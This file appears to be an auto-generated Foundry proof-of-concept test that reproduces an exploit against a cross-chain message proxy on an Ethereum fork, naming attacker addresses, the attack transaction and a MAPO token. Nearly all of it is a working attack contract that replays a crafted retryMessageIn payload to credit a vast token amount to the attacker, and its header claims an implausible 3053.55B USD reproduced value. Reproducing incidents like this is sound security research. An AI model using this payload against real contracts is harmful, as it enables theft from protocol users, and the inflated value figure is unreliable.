// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.20;

import {Vm, Test, console2} from "forge-std/Test.sol";
import {LumosPoCBase} from "./LumosPoCBase.sol";

// @KeyInfo - Total Lost : N/A
// Attacker : 0x40592025392bd7d7463711c6e82ed34241b64279
// Attack Contract : 0x2475396a308861559ef30dc46aad6136367a1c30
// Vulnerable Contract : 0x2475396a308861559ef30dc46aad6136367a1c30
// Attack Tx : 0x31e56b4737649e0acdb0ebb4eca44d16aeca25f60c022cbde85f092bde27664a
// Block : 25137572
// Chain : Ethereum
// Analysis :
//
// @Reproduction
// Verdict : pass
// Economic Proof : attacker_profit_reproduction
// Reproduced Value : 3053.55B USD
//
// @POC Author
// Generated by LumosKit

contract AttackTest is LumosPoCBase {
    address constant ATTACKER_EOA = LumosAddresses.attacker_eoa;
    address constant ATTACK_CONTRACT = LumosAddresses.attack_contract;
    uint256 constant FORK_BLOCK = 25137571;
    uint256 constant TX_TIMESTAMP = 1779293639;
    uint256 constant TX_BLOCK_NUMBER = 25137572;
    uint256 constant TX_VALUE = 0;

    function setUp() public {
        vm.createSelectFork(vm.envString("LUMOSKIT_FORK_ENDPOINT"), FORK_BLOCK);
        if (TX_TIMESTAMP != 0) vm.warp(TX_TIMESTAMP);
        if (TX_BLOCK_NUMBER != 0) vm.roll(TX_BLOCK_NUMBER);
    }

    function testPoC() public {
        _runExploit();
    }

    function _runExploit() internal {
        _fundCaller();
        vm.startPrank(ATTACKER_EOA, ATTACKER_EOA);
        CrossChainMessageAttack attack = _prepareAttackContract();
        _expectOutcome(address(attack));
        _snapProfit();
        _logBalances("Before exploit");
        attack.attack{value: TX_VALUE}();
        _logBalances("After exploit");
        vm.stopPrank();
        _assertProfit();
    }

    function _fundCaller() internal {
        if (TX_VALUE == 0) return;
        vm.deal(ATTACKER_EOA, TX_VALUE);
        vm.deal(address(this), TX_VALUE);
    }

    function _prepareAttackContract() internal returns (CrossChainMessageAttack attack) {
        if (ATTACK_CONTRACT != address(0)) {
            _installAttackRuntime();
            return CrossChainMessageAttack(payable(ATTACK_CONTRACT));
        }
        return new CrossChainMessageAttack();
    }

    function _installAttackRuntime() internal {
        vm.allowCheatcodes(ATTACK_CONTRACT);
        _etchAttackRuntime(ATTACK_CONTRACT, type(CrossChainMessageAttack).runtimeCode);
    }

    function _etchAttackRuntime(address where, bytes memory runtimeCode) internal {
        Vm(address(vm)).etch(where, runtimeCode);
    }

    function _expectOutcome(address attack) internal {
        attack;
        _expectProfit(LumosAddresses.attacker_eoa, address(0), LumosAddresses.MAPO, "MAPO", 1000000000000000000000000000000000);
    }
}

contract CrossChainMessageAttack {
    uint256 internal constant SOURCE_CHAIN_AND_MESSAGE_NONCE = 0x58f8000000000000000100000000000000000000000000000000;
    bytes32 internal constant MESSAGE_ID = 0xf2fbaa8a33bc05e0454299f2d43ed99fdb5cf024770484bbb598ace5e0c7d4a4;

    function attack() external payable {
        retryOmniServiceMessage();
    }

    function retryOmniServiceMessage() public {
        IOmniServiceProxy(LumosAddresses.OmniServiceProxy).retryMessageIn(
            SOURCE_CHAIN_AND_MESSAGE_NONCE,
            MESSAGE_ID,
            LumosAddresses.ZERO,
            0,
            retryMessagePayloadSender(),
            tokenCreditAndExecutionPayload(),
            emptyAdapterParams()
        );
    }

    function retryMessagePayloadSender() internal pure returns (bytes memory) {
        return hex"1ad1a4a19bc9983a98f5d9ac8442c6dfc4276167";
    }

    function tokenCreditAndExecutionPayload() internal pure returns (bytes memory) {
        return hex"0000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000271000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000140000000000000000000000000000000000000000000000000000000000000003c2475396a308861559ef30dc46aad6136367a1c302475396a308861559ef30dc46aad6136367a1c302475396a308861559ef30dc46aad6136367a1c3000000000000000000000000000000000000000000000000000000000000000000000001466d79b8f60ec93bfce0b56f5ac14a2714e509a9900000000000000000000000000000000000000000000000000000000000000000000000000000000000001601de78eb8658305a581b2f1610c96707b0204d5cba6a782b313672045fa5a87c800000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000000000000000314dc6448d9338c15b0a000000000000000000000000000000000000000000000000000000000000000000000012000000000000000000000000000000000000000000000000000000000000001440592025392bd7d7463711c6e82ed34241b64279000000000000000000000000000000000000000000000000000000000000000000000000000000000000001440592025392bd7d7463711c6e82ed34241b64279000000000000000000000000";
    }

    function emptyAdapterParams() internal pure returns (bytes memory) {
        return hex"";
    }

    receive() external payable {}

    fallback() external payable {
        if (msg.sig == 0x7d217d5b) {
            retryOmniServiceMessage();
            return;
        }
        acceptTokenFallback();
    }

    function acceptTokenFallback() internal {}
}

interface IERC20Like {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external;
    function transfer(address to, uint256 amount) external;
    function transferFrom(address from, address to, uint256 amount) external;
}

interface IERC721Like {
    function safeTransferFrom(address from, address to, uint256 tokenId) external;
}

interface IMulticallLike {
    function multicall(bytes[] calldata data) external returns (bytes[] memory results);
}

struct LumosObservedCall {
    address target;
    bytes data;
}

library LumosAddresses {
    address internal constant ZERO = address(0);
    address internal constant OmniServiceProxy = 0x0000317Bec33Af037b5fAb2028f52d14658F6A56;
    address internal constant A_1AD1A4_6167 = 0x1AD1a4A19Bc9983a98F5D9AC8442c6DfC4276167;
    address internal constant attack_contract = 0x2475396A308861559EF30dc46aad6136367a1C30;
    address internal constant attacker_eoa = 0x40592025392BD7d7463711c6E82Ed34241B64279;
    address internal constant MAPO = 0x66D79B8f60ec93Bfce0b56F5Ac14A2714E509a99;
    address internal constant BalancerVault = 0xBA12222222228d8Ba445958a75a0704d566BF2C8;
}

interface IOmniServiceProxy {
    function retryMessageIn(
        uint256 srcChainIdAndNonce,
        bytes32 messageId,
        address receiver,
        uint256 gasLimit,
        bytes calldata sender,
        bytes calldata payload,
        bytes calldata adapterParams
    ) external;
}
